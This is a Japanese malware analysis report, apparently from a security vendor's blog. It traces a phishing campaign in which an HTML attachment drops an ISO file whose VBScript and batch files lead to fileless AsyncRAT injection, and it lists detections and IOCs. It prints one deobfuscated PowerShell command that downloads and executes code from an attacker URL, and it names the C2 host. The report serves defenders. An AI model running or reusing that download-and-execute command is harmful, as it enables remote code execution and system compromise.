FileLess 形式で拡散する AsyncRAT

ASEC 分析チームは最近、FileLess 形式で AsyncRAT マルウェアが拡散していることを確認した。拡散している AsyncRAT は多数のスクリプトファイルを通じて FileLess 形式で実行され、電子メール内の圧縮ファイルとして添付されて拡散しているものと推定される。AsyncRAT は .NET で開発されたオープンソース RAT マルウェアであり、攻撃者のコマンドを受け取り様々な不正な振る舞いを実行する。

フィッシングメールを通じて配布される圧縮ファイルの内部には html ファイルが存在し、これを開くと内部のスクリプトに存在する不正なデータを ISO ファイルとして保存する。ISO は最近になり様々なマルウェアが使用している拡張子である。

圧縮ファイルの中身
不正な ISO ファイルを生成する HTML

生成される ISO ファイルは領収証および送り状に関連したファイル名を使用し、ISO ファイル内部には VBScript と bat ファイルが存在する。

  • ファイル名
    Receipt.iso
    Paid_invoice.iso
ISO ファイルの中身 (1)
ISO ファイルの中身 (2)

VBScript は同時に生成された bat ファイルを実行し、bat ファイルは難読化されたコマンドを実行する。

VBS コード
BAT コード

難読化を解除したコマンドは以下の通りであり、cmd によって不正な PowerShell コマンドを実行する。PowerShell コマンドは特定のアドレスに存在する、さらなる PowerShell コマンドを実行させる。

  • 難読化を解除したコマンド
    CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$XCZM=’IEX(NEW-OBJECT NET.W’;$SYWD=’EBCLIENT).DOWNLO’;[BYTE[]];$VFDR=’TUUL(”hxxps://aga12[.]ir/ico.png”)’.REPLACE(‘TUUL’,’ADSTRING’);[BYTE[]];IEX($XCZM+$SYWD+$VFDR)

追加の PowerShell コマンドの一部は以下の通りであり、計5つのスクリプトファイルを生成したあと、実行する機能を担う。生成される5つのスクリプトの機能は下記で紹介する。

追加 PowerShell のコマンド (1)
追加 PowerShell のコマンド (2)

1. C:\ProgramData\Express\xx.vbs

xx.vbs コード

5つのスクリプトが生成されたあと、最初に実行されるスクリプトファイルである。このスクリプトは、同時に生成された C:\ProgramData\Express\xx.bat ファイルを実行する。

2. C:\ProgramData\Express\xx.bat

xx.bat コード

このスクリプトは C:\ProgramData\Express\Cotrl.vbs ファイルをタスクスケジューラに登録する機能を担う。スケジューラに登録されたファイルは3分ごとに実行されるようにする。

3. C:\ProgramData\Express\Cotrl.vbs

Cotrl.vbs

このスクリプトは C:\ProgramData\Express\Cotrl.bat ファイルを実行する。

4. C:\ProgramData\Express\Cotrl.bat

Cotrl.bat コード

このスクリプトは PowerShell プロセスを強制終了したあと C:\ProgramData\Express\Cotrl.ps1 ファイルを実行する。

5. C:\ProgramData\Express\Cotrl.ps1

Cotrl.ps1 コード (1)
Cotrl.ps1 コード (2)

最終的に実行されるこのスクリプトが、実際の不正な振る舞いを実行する。スクリプトの内部には、Loader と AsyncRAT という2つの不正なデータが存在する。まず Loader の役割を担う1つ目のデータがロードされ、このデータの GIT.local の Execute メソッドを実行する。この時、「C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe」のパスと2つ目のデータ(AsyncRAT)が引数として渡される。

GIT.local の Execute メソッドは以下の通りであり、引数として渡されたパスと不正なデータを利用して、正常なプロセス(C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe)にインジェクションを実行する。

Loader
Injection

インジェクションされるデータは AsyncRAT で、GitHub に公開されているオープンソース RAT マルウェアである。C2 から攻撃者のコマンドを受け取って様々な不正な振る舞いを実行することができ、大半の機能は渡されるプラグインによって不正な振る舞いが実行される。デフォルトで存在する機能は、Anti-VM、キーロガー、リモートシェル等が存在する。

  • C2
    vrln200.duckdns[.]org:6666
C2 の復号化
Anti VM

最近、ISO ファイルを通じて拡散するマルウェアが増えている。また、FileLess 形式でマルウェアを実行することで、ユーザーがどのようなタイプのマルウェアが実行されたのか把握するのが困難なようにしている。ユーザーは出どころが不明なファイルを閲覧しないようにしなければならず、定期的な PC のチェックが必要である。

[ファイル検知]
Dropper/HTML.Generic (2022.08.11.03)
Trojan/PowerShell.Loader (2022.08.18.00)
Dropper/ISO.Agent (2022.08.18.00)
Trojan/BAT.Runner (2022.08.18.00)
Downloader/BAT.Generic (2022.08.18.00)
Trojan/VBS.Runner (2022.08.18.00)

[IOC]
9e0d553e520083e2f90a8e3bb524f417
ac64ee0dea61fb0f596e3296f91462e5
f45ea3dc3e06583d49ac40833873006f
309d105bf0542574a9324f568b176021
ce77a7fb92d52727c19aca72d904abdc
752d899ee21cbdd31126e205b5840286
e0b62836b48a842f732c51857d37dbd8
448516ed6b6ef06865afbc775cd80bed
43ff49fbde6f4391891cf2a46b406da4
c840c0438f2fae0ddda74a43411a9b01
2a1082f25edff1dc5383239b1b012179
hxxps://aga12[.]ir/ico.png
vrln200.duckdns[.]org:6666

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

0 0 votes
評価する
guest
0 コメント
Inline Feedbacks
View all comments